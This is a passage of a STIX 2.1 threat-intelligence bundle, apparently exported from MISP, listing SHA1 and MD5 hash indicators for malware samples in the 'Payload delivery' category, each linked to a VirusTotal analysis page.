|
"id": "url--58db81dd-9030-4638-8e58-4fe502de0b81",
|
|
"value": "https://www.virustotal.com/file/8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d/analysis/1486720843/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81de-0310-4e92-a037-41ea02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:58.000Z",
|
|
"modified": "2017-03-29T09:43:58.000Z",
|
|
"description": "sample - Xchecked via VT: 5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b",
|
|
"pattern": "[file:hashes.SHA1 = '84020d6ce2a9412eaf3cacfc65586ebcb8494638']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81df-65b4-4f42-ab07-400102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:59.000Z",
|
|
"modified": "2017-03-29T09:43:59.000Z",
|
|
"description": "sample - Xchecked via VT: 5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b",
|
|
"pattern": "[file:hashes.MD5 = '9c4d1a6c550f43bb3091e658206bc5d0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:59Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81e0-d254-4450-b3ce-4c2302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:00.000Z",
|
|
"modified": "2017-03-29T09:44:00.000Z",
|
|
"first_observed": "2017-03-29T09:44:00Z",
|
|
"last_observed": "2017-03-29T09:44:00Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81e0-d254-4450-b3ce-4c2302de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81e0-d254-4450-b3ce-4c2302de0b81",
|
|
"value": "https://www.virustotal.com/file/5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b/analysis/1477576159/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e1-9af8-4770-bd8d-4a1d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:01.000Z",
|
|
"modified": "2017-03-29T09:44:01.000Z",
|
|
"description": "sample - Xchecked via VT: 2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7",
|
|
"pattern": "[file:hashes.SHA1 = '1071781ebfe2a35782ed780cb2018ff4263dd63b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e2-be48-4d14-8a6f-407402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:02.000Z",
|
|
"modified": "2017-03-29T09:44:02.000Z",
|
|
"description": "sample - Xchecked via VT: 2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7",
|
|
"pattern": "[file:hashes.MD5 = '3cced2eb2f0b29b6083b218242dd364b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:02Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81e3-640c-4467-99b5-472102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:03.000Z",
|
|
"modified": "2017-03-29T09:44:03.000Z",
|
|
"first_observed": "2017-03-29T09:44:03Z",
|
|
"last_observed": "2017-03-29T09:44:03Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81e3-640c-4467-99b5-472102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81e3-640c-4467-99b5-472102de0b81",
|
|
"value": "https://www.virustotal.com/file/2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7/analysis/1475326816/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e4-97d4-4740-a318-451a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:04.000Z",
|
|
"modified": "2017-03-29T09:44:04.000Z",
|
|
"description": "sample - Xchecked via VT: b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c",
|
|
"pattern": "[file:hashes.SHA1 = '16eeb6f49da5189c87b663b2c4b47a56da40077a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e5-03cc-4b0f-90d5-452a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:05.000Z",
|
|
"modified": "2017-03-29T09:44:05.000Z",
|
|
"description": "sample - Xchecked via VT: b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c",
|
|
"pattern": "[file:hashes.MD5 = '70392d4078586c5569a5b06f07fdf115']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81e6-7e8c-42d8-85ce-4c4902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:06.000Z",
|
|
"modified": "2017-03-29T09:44:06.000Z",
|
|
"first_observed": "2017-03-29T09:44:06Z",
|
|
"last_observed": "2017-03-29T09:44:06Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81e6-7e8c-42d8-85ce-4c4902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81e6-7e8c-42d8-85ce-4c4902de0b81",
|
|
"value": "https://www.virustotal.com/file/b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c/analysis/1414533718/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e7-7574-4d14-b2ed-4e9002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:07.000Z",
|
|
"modified": "2017-03-29T09:44:07.000Z",
|
|
"description": "sample - Xchecked via VT: abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c",
|
|
"pattern": "[file:hashes.SHA1 = 'f3b15b377a139cc66cb4333e016aaff891ce83ab']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e8-00f0-4b54-8b33-487f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:08.000Z",
|
|
"modified": "2017-03-29T09:44:08.000Z",
|
|
"description": "sample - Xchecked via VT: abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c",
|
|
"pattern": "[file:hashes.MD5 = 'aac54a8e31c96ef16010510bfd0de088']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81e8-ebac-4916-b187-4a6e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:08.000Z",
|
|
"modified": "2017-03-29T09:44:08.000Z",
|
|
"first_observed": "2017-03-29T09:44:08Z",
|
|
"last_observed": "2017-03-29T09:44:08Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81e8-ebac-4916-b187-4a6e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81e8-ebac-4916-b187-4a6e02de0b81",
|
|
"value": "https://www.virustotal.com/file/abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c/analysis/1416093791/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81e9-2058-44f9-ab87-488b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:09.000Z",
|
|
"modified": "2017-03-29T09:44:09.000Z",
|
|
"description": "sample - Xchecked via VT: c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e",
|
|
"pattern": "[file:hashes.SHA1 = 'e0a49b2c66212b97523c244f19b79595ac24dadf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ea-9e40-451d-b371-47c602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:10.000Z",
|
|
"modified": "2017-03-29T09:44:10.000Z",
|
|
"description": "sample - Xchecked via VT: c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e",
|
|
"pattern": "[file:hashes.MD5 = '722b9cb87449c054467b328d809a68cf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81eb-d220-490f-9716-418002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:11.000Z",
|
|
"modified": "2017-03-29T09:44:11.000Z",
|
|
"first_observed": "2017-03-29T09:44:11Z",
|
|
"last_observed": "2017-03-29T09:44:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81eb-d220-490f-9716-418002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81eb-d220-490f-9716-418002de0b81",
|
|
"value": "https://www.virustotal.com/file/c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e/analysis/1414023386/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ec-4ea4-4dba-8db5-49e702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:12.000Z",
|
|
"modified": "2017-03-29T09:44:12.000Z",
|
|
"description": "sample - Xchecked via VT: ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d",
|
|
"pattern": "[file:hashes.SHA1 = 'a8132f20d584e60c99488037f06baf4a595c576f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ed-8f24-4d24-ab2a-464002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:13.000Z",
|
|
"modified": "2017-03-29T09:44:13.000Z",
|
|
"description": "sample - Xchecked via VT: ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d",
|
|
"pattern": "[file:hashes.MD5 = '317a694d72a40980a8afaac48130371b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81ee-6674-4254-9170-49fc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:14.000Z",
|
|
"modified": "2017-03-29T09:44:14.000Z",
|
|
"first_observed": "2017-03-29T09:44:14Z",
|
|
"last_observed": "2017-03-29T09:44:14Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81ee-6674-4254-9170-49fc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81ee-6674-4254-9170-49fc02de0b81",
|
|
"value": "https://www.virustotal.com/file/ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d/analysis/1417598116/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ef-5ff8-4080-a856-409602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:15.000Z",
|
|
"modified": "2017-03-29T09:44:15.000Z",
|
|
"description": "sample - Xchecked via VT: 201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b",
|
|
"pattern": "[file:hashes.SHA1 = '3dc28d02a2aa7f21e4160306e06b671bd6c2b255']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f0-532c-4e12-9892-40c002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:16.000Z",
|
|
"modified": "2017-03-29T09:44:16.000Z",
|
|
"description": "sample - Xchecked via VT: 201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b",
|
|
"pattern": "[file:hashes.MD5 = 'af31639373656153cf1370618500594f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81f1-33d8-4b55-911a-49db02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:17.000Z",
|
|
"modified": "2017-03-29T09:44:17.000Z",
|
|
"first_observed": "2017-03-29T09:44:17Z",
|
|
"last_observed": "2017-03-29T09:44:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81f1-33d8-4b55-911a-49db02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81f1-33d8-4b55-911a-49db02de0b81",
|
|
"value": "https://www.virustotal.com/file/201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b/analysis/1413338410/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f2-1f8c-4cbc-a1f5-436c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:18.000Z",
|
|
"modified": "2017-03-29T09:44:18.000Z",
|
|
"description": "sample - Xchecked via VT: b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2",
|
|
"pattern": "[file:hashes.SHA1 = '009917771f20638c341fcbafde1b0213816a2530']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f3-b72c-4f0e-95bb-497402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:19.000Z",
|
|
"modified": "2017-03-29T09:44:19.000Z",
|
|
"description": "sample - Xchecked via VT: b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2",
|
|
"pattern": "[file:hashes.MD5 = 'fafe1cd2f25cf092c96868e630ab6c76']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81f4-4c44-4438-b49b-4c0602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:20.000Z",
|
|
"modified": "2017-03-29T09:44:20.000Z",
|
|
"first_observed": "2017-03-29T09:44:20Z",
|
|
"last_observed": "2017-03-29T09:44:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81f4-4c44-4438-b49b-4c0602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81f4-4c44-4438-b49b-4c0602de0b81",
|
|
"value": "https://www.virustotal.com/file/b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2/analysis/1430363714/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f5-0508-44b2-8e59-496302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:21.000Z",
|
|
"modified": "2017-03-29T09:44:21.000Z",
|
|
"description": "sample - Xchecked via VT: d653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8",
|
|
"pattern": "[file:hashes.SHA1 = '2c44c0fb1f37159328b46e34b1c893bebc4e2988']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f6-a938-4e20-a81f-436202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:22.000Z",
|
|
"modified": "2017-03-29T09:44:22.000Z",
|
|
"description": "sample - Xchecked via VT: d653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8",
|
|
"pattern": "[file:hashes.MD5 = 'a0e53505ac0ba00e673324a92418bfd3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81f7-06bc-4370-bc05-47ca02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:23.000Z",
|
|
"modified": "2017-03-29T09:44:23.000Z",
|
|
"first_observed": "2017-03-29T09:44:23Z",
|
|
"last_observed": "2017-03-29T09:44:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81f7-06bc-4370-bc05-47ca02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81f7-06bc-4370-bc05-47ca02de0b81",
|
|
"value": "https://www.virustotal.com/file/d653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8/analysis/1434072953/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f8-de58-41fd-aeb5-49ed02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:24.000Z",
|
|
"modified": "2017-03-29T09:44:24.000Z",
|
|
"description": "sample - Xchecked via VT: 85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07",
|
|
"pattern": "[file:hashes.SHA1 = 'fbc56356d4c4d77a6a1c5151a72f417d3a3b5b05']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81f9-fc00-48b2-a142-47b002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:25.000Z",
|
|
"modified": "2017-03-29T09:44:25.000Z",
|
|
"description": "sample - Xchecked via VT: 85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07",
|
|
"pattern": "[file:hashes.MD5 = '4c7e689191949e0b13087037be8a88b8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:44:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81fa-d03c-47db-b6fa-469802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:44:26.000Z",
|
|
"modified": "2017-03-29T09:44:26.000Z",
|
|
"first_observed": "2017-03-29T09:44:26Z",
|
|
"last_observed": "2017-03-29T09:44:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81fa-d03c-47db-b6fa-469802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
